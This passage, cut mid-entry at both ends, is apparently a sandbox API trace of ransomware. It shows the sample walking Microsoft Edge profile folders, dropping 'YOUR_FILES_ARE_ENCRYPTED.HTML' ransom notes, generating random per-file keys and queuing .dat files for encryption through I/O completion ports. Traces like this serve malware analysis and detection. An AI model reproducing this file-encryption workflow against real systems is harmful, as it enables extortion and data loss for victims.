(lpFirst="Favorites", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.366] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites") returned 126 [0116.366] GetProcessHeap () returned 0x600000 [0116.366] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x32c81a0 [0116.366] lstrcpyW (in: lpString1=0x32c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites" [0116.366] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\*" [0116.366] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x471725d, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x471725d, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x471725d, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.366] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x471725d, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x471725d, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x471725d, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="..", cAlternateFileName="")) returned 1 [0116.366] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x471725d, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x471725d, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x471725d, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="..", cAlternateFileName="")) returned 0 [0116.366] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.366] wnsprintfW (in: pszDest=0x32c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 156 [0116.366] GetProcessHeap () returned 0x600000 [0116.366] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.366] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Favorites\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\favorites\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x338 [0116.367] WriteFile (in: hFile=0x338, lpBuffer=0x6d77d0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19d840, lpOverlapped=0x0 | out: lpBuffer=0x6d77d0*, lpNumberOfBytesWritten=0x19d840*=0x3c00, lpOverlapped=0x0) returned 1 [0116.368] CloseHandle (hObject=0x338) returned 1 [0116.368] GetProcessHeap () returned 0x600000 [0116.368] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x6d77d0 | out: hHeap=0x600000) returned 1 [0116.368] GetProcessHeap () returned 0x600000 [0116.368] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x32c81a0 | out: hHeap=0x600000) returned 1 [0116.368] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19d888 | out: lpFindFileData=0x19d888*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x47fc06f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x47fc06f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318f910, dwReserved1=0x25000025, cFileName="Recovery", cAlternateFileName="")) returned 1 [0116.368] StrStrIW (lpFirst="Recovery", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.368] wnsprintfW (in: pszDest=0x670340, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery") returned 125 [0116.368] GetProcessHeap () returned 0x600000 [0116.368] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x32c81a0 [0116.368] lstrcpyW (in: lpString1=0x32c81a0, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery" [0116.368] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\*" [0116.368] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\*", lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x47fc06f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x47fc06f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName=".", cAlternateFileName="")) returned 0x6268b8 [0116.368] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x47fc06f, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x47fc06f, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="..", cAlternateFileName="")) returned 1 [0116.368] FindNextFileW (in: hFindFile=0x6268b8, lpFindFileData=0x19d574 | out: lpFindFileData=0x19d574*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x78edcc8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x78edcc8, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6f5d12, dwReserved1=0x6f5c28, cFileName="Active", cAlternateFileName="")) returned 1 [0116.368] StrStrIW (lpFirst="Active", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.369] wnsprintfW (in: pszDest=0x32c81a0, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active") returned 132 [0116.369] GetProcessHeap () returned 0x600000 [0116.369] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x32d81a8 [0116.369] lstrcpyW (in: lpString1=0x32d81a8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active" [0116.369] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\*" [0116.369] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\*", lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x78edcc8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x7d19e41, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318bc78, dwReserved1=0x6f5c30, cFileName=".", cAlternateFileName="")) returned 0x626838 [0116.370] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x47fc06f, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x78edcc8, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x7d19e41, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x318bc78, dwReserved1=0x6f5c30, cFileName="..", cAlternateFileName="")) returned 1 [0116.370] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x78c7a52, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x78c7a52, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x7d19e41, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1400, dwReserved0=0x318bc78, dwReserved1=0x6f5c30, cFileName="RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat", cAlternateFileName="RECOVE~2.DAT")) returned 1 [0116.370] StrStrIW (lpFirst="RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.371] wnsprintfW (in: pszDest=0x32d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned 189 [0116.371] PathFindExtensionW (pszPath="RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned=".dat" [0116.371] lstrlenW (lpString=".dat") returned 4 [0116.371] PathFindExtensionW (pszPath="RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned=".dat" [0116.371] SystemFunction036 (in: RandomBuffer=0x19d208, RandomBufferLength=0x20 | out: RandomBuffer=0x19d208) returned 1 [0116.371] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\recovery\\active\\recoverystore.{44f17ef9-7053-11eb-b0ac-0050f0b0ffdb}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0116.376] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d22c | out: lpFileSize=0x19d22c*=5120) returned 1 [0116.376] GetProcessHeap () returned 0x600000 [0116.376] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0116.378] wsprintfW (in: param_1=0x19d146, param_2="%02X" | out: param_1="43") returned 2 [0116.378] wsprintfW (in: param_1=0x19d14a, param_2="%02X" | out: param_1="66") returned 2 [0116.378] wsprintfW (in: param_1=0x19d14e, param_2="%02X" | out: param_1="20") returned 2 [0116.378] wsprintfW (in: param_1=0x19d152, param_2="%02X" | out: param_1="A1") returned 2 [0116.378] wsprintfW (in: param_1=0x19d156, param_2="%02X" | out: param_1="E2") returned 2 [0116.378] wsprintfW (in: param_1=0x19d15a, param_2="%02X" | out: param_1="E1") returned 2 [0116.378] wsprintfW (in: param_1=0x19d15e, param_2="%02X" | out: param_1="4C") returned 2 [0116.378] wsprintfW (in: param_1=0x19d162, param_2="%02X" | out: param_1="A3") returned 2 [0116.378] wsprintfW (in: param_1=0x19d166, param_2="%02X" | out: param_1="BC") returned 2 [0116.378] wsprintfW (in: param_1=0x19d16a, param_2="%02X" | out: param_1="68") returned 2 [0116.378] wsprintfW (in: param_1=0x19d16e, param_2="%02X" | out: param_1="5E") returned 2 [0116.378] wsprintfW (in: param_1=0x19d172, param_2="%02X" | out: param_1="D9") returned 2 [0116.378] wsprintfW (in: param_1=0x19d176, param_2="%02X" | out: param_1="88") returned 2 [0116.378] wsprintfW (in: param_1=0x19d17a, param_2="%02X" | out: param_1="57") returned 2 [0116.378] wsprintfW (in: param_1=0x19d17e, param_2="%02X" | out: param_1="45") returned 2 [0116.378] wsprintfW (in: param_1=0x19d182, param_2="%02X" | out: param_1="94") returned 2 [0116.378] wsprintfW (in: param_1=0x19d186, param_2="%02X" | out: param_1="06") returned 2 [0116.378] wsprintfW (in: param_1=0x19d18a, param_2="%02X" | out: param_1="44") returned 2 [0116.378] wsprintfW (in: param_1=0x19d18e, param_2="%02X" | out: param_1="5B") returned 2 [0116.378] wsprintfW (in: param_1=0x19d192, param_2="%02X" | out: param_1="61") returned 2 [0116.379] wsprintfW (in: param_1=0x19d196, param_2="%02X" | out: param_1="39") returned 2 [0116.379] wsprintfW (in: param_1=0x19d19a, param_2="%02X" | out: param_1="52") returned 2 [0116.379] wsprintfW (in: param_1=0x19d19e, param_2="%02X" | out: param_1="0C") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1a2, param_2="%02X" | out: param_1="C4") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1a6, param_2="%02X" | out: param_1="6A") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1aa, param_2="%02X" | out: param_1="A2") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1ae, param_2="%02X" | out: param_1="96") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1b2, param_2="%02X" | out: param_1="BE") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1b6, param_2="%02X" | out: param_1="91") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1ba, param_2="%02X" | out: param_1="84") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1be, param_2="%02X" | out: param_1="50") returned 2 [0116.379] wsprintfW (in: param_1=0x19d1c2, param_2="%02X" | out: param_1="30") returned 2 [0116.379] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\RecoveryStore.{44F17EF9-7053-11EB-B0AC-0050F0B0FFDB}.dat" [0116.379] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.379] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0116.380] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7d19e41, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x7d19e41, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x7d19e41, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x318bc78, dwReserved1=0x6f5c30, cFileName="{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat", cAlternateFileName="{44F17~1.DAT")) returned 1 [0116.380] StrStrIW (lpFirst="{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0116.380] wnsprintfW (in: pszDest=0x32d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned 175 [0116.380] PathFindExtensionW (pszPath="{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned=".dat" [0116.380] lstrlenW (lpString=".dat") returned 4 [0116.380] PathFindExtensionW (pszPath="{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned=".dat" [0116.380] SystemFunction036 (in: RandomBuffer=0x19d208, RandomBufferLength=0x20 | out: RandomBuffer=0x19d208) returned 1 [0116.381] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.microsoftedge_8wekyb3d8bbwe\\ac\\microsoftedge\\user\\default\\recovery\\active\\{44f17efb-7053-11eb-b0ac-0050f0b0ffdb}.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x318 [0116.383] GetFileSizeEx (in: hFile=0x318, lpFileSize=0x19d22c | out: lpFileSize=0x19d22c*=4608) returned 1 [0116.383] GetProcessHeap () returned 0x600000 [0116.383] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x28150) returned 0x32a0048 [0116.384] wsprintfW (in: param_1=0x19d146, param_2="%02X" | out: param_1="54") returned 2 [0116.384] wsprintfW (in: param_1=0x19d14a, param_2="%02X" | out: param_1="E4") returned 2 [0116.384] wsprintfW (in: param_1=0x19d14e, param_2="%02X" | out: param_1="FC") returned 2 [0116.384] wsprintfW (in: param_1=0x19d152, param_2="%02X" | out: param_1="64") returned 2 [0116.384] wsprintfW (in: param_1=0x19d156, param_2="%02X" | out: param_1="15") returned 2 [0116.384] wsprintfW (in: param_1=0x19d15a, param_2="%02X" | out: param_1="D6") returned 2 [0116.384] wsprintfW (in: param_1=0x19d15e, param_2="%02X" | out: param_1="51") returned 2 [0116.384] wsprintfW (in: param_1=0x19d162, param_2="%02X" | out: param_1="0B") returned 2 [0116.384] wsprintfW (in: param_1=0x19d166, param_2="%02X" | out: param_1="1D") returned 2 [0116.384] wsprintfW (in: param_1=0x19d16a, param_2="%02X" | out: param_1="52") returned 2 [0116.384] wsprintfW (in: param_1=0x19d16e, param_2="%02X" | out: param_1="DF") returned 2 [0116.384] wsprintfW (in: param_1=0x19d172, param_2="%02X" | out: param_1="50") returned 2 [0116.384] wsprintfW (in: param_1=0x19d176, param_2="%02X" | out: param_1="52") returned 2 [0116.384] wsprintfW (in: param_1=0x19d17a, param_2="%02X" | out: param_1="C8") returned 2 [0116.384] wsprintfW (in: param_1=0x19d17e, param_2="%02X" | out: param_1="EB") returned 2 [0116.384] wsprintfW (in: param_1=0x19d182, param_2="%02X" | out: param_1="E8") returned 2 [0116.384] wsprintfW (in: param_1=0x19d186, param_2="%02X" | out: param_1="49") returned 2 [0116.384] wsprintfW (in: param_1=0x19d18a, param_2="%02X" | out: param_1="E3") returned 2 [0116.384] wsprintfW (in: param_1=0x19d18e, param_2="%02X" | out: param_1="44") returned 2 [0116.384] wsprintfW (in: param_1=0x19d192, param_2="%02X" | out: param_1="CA") returned 2 [0116.384] wsprintfW (in: param_1=0x19d196, param_2="%02X" | out: param_1="8A") returned 2 [0116.384] wsprintfW (in: param_1=0x19d19a, param_2="%02X" | out: param_1="B1") returned 2 [0116.384] wsprintfW (in: param_1=0x19d19e, param_2="%02X" | out: param_1="8D") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1a2, param_2="%02X" | out: param_1="8E") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1a6, param_2="%02X" | out: param_1="CB") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1aa, param_2="%02X" | out: param_1="EF") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1ae, param_2="%02X" | out: param_1="16") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1b2, param_2="%02X" | out: param_1="EC") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1b6, param_2="%02X" | out: param_1="76") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1ba, param_2="%02X" | out: param_1="45") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1be, param_2="%02X" | out: param_1="9A") returned 2 [0116.384] wsprintfW (in: param_1=0x19d1c2, param_2="%02X" | out: param_1="06") returned 2 [0116.385] lstrcpyW (in: lpString1=0x32b00fc, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat" [0116.385] CreateIoCompletionPort (FileHandle=0x318, ExistingCompletionPort=0x274, CompletionKey=0x32a0048, NumberOfConcurrentThreads=0x0) returned 0x274 [0116.385] PostQueuedCompletionStatus (CompletionPort=0x274, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x32a0048, lpOverlapped=0x32a0048) returned 1 [0116.386] FindNextFileW (in: hFindFile=0x626838, lpFindFileData=0x19d260 | out: lpFindFileData=0x19d260*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7d19e41, ftCreationTime.dwHighDateTime=0x1d70460, ftLastAccessTime.dwLowDateTime=0x7d19e41, ftLastAccessTime.dwHighDateTime=0x1d70460, ftLastWriteTime.dwLowDateTime=0x7d19e41, ftLastWriteTime.dwHighDateTime=0x1d70460, nFileSizeHigh=0x0, nFileSizeLow=0x1200, dwReserved0=0x318bc78, dwReserved1=0x6f5c30, cFileName="{44F17EFB-7053-11EB-B0AC-0050F0B0FFDB}.dat", cAlternateFileName="{44F17~1.DAT")) returned 0 [0116.386] FindClose (in: hFindFile=0x626838 | out: hFindFile=0x626838) returned 1 [0116.386] wnsprintfW (in: pszDest=0x32d81a8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\\AC\\MicrosoftEdge\\User\\Default\\Recovery\\Active\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 162 [0116.386] GetProcessHeap () returned 0x600000 [0116.386] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x6d77d0 [0116.388] CreateFileW 